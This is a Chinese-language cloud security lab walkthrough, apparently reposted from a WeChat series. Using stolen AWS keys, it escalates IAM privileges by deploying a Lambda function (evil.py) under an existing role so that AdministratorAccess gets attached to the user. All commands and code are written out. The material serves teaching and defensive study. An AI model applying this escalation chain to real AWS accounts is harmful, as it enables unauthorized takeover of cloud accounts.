国内云安全培训请点击原文或访问以下链接
https://www.yuque.com/u8047536/supvqp/ri4ft0
前提是已经获取了相关的密钥
步骤 1:将 AWS CLI配置为访问凭证
步骤 2:列出附加到用户的AWS 托管策略
aws iam list-attached-user-policies --user-name xxx aws iam list-user-policies --user-name xx
步骤 3:尝试在AWS账户上创建用户
aws iam create-user --user-name Bob
由于权限不足,用户创建失败
步骤 4: 查看策略权限和详细信息
aws iam get-user-policy --user-name xx --policy-name terraform-20210211103351240800000003
步骤 5:列出 AWS 账户上可以传递给 Lambda 的角色
aws iam list roles
步骤 6:查看 lab11lambdaiam角色详细信息
aws iam get-role --role-name lab11lambdaiam
aws iam list-role-policies --role-name lab11lambdaiam
aws iam get-role-policy --role-name lab11lambdaiam --policy-name terraform-20210212050404291100000002
步骤 7:创建包含以下内容的 python 脚本
Python Script: evil.py
import boto3
def handler(event, context): iam = boto3.client("iam")
response = iam.attach_user_policy(
UserName="student", PolicyArn="arn:aws:iam::aws:policy/AdministratorAccess"
)
return response
步骤8:使用zip压缩 python脚本
zip evil-function.zip evil.py
步骤 9:在 AWS 账户上创建 lambda函数
aws lambda create-function
--function-name evil-function
--runtime python3.8
--zip-file fileb://evil-function.zip
--handler evil.handler
--role arn:aws:iam::6xxxxxxxxx1:role/lab11lambdaiam
步骤 10:调用新创建的Lambda 函数
aws lambda invoke --function-name evil-function invoke_out.txt
步骤 11:检查xx用户的附加策略
aws iam list-attached-user-policies --user-name xx
已成功将管理员访问策略(AdministratorAccess)附加到xx用户
步骤 12:尝试 在AWS账户上创建新用户
● aws iam create-user --user-name Bob
已成功执行特权操作.
References:
1.AWSCLI(https://docs.aws.amazon.com/cli/latest/reference/)
原文始发于微信公众号(关注安全技术):AWS云安全系列 9 - IAM-Lambda
免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉。
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论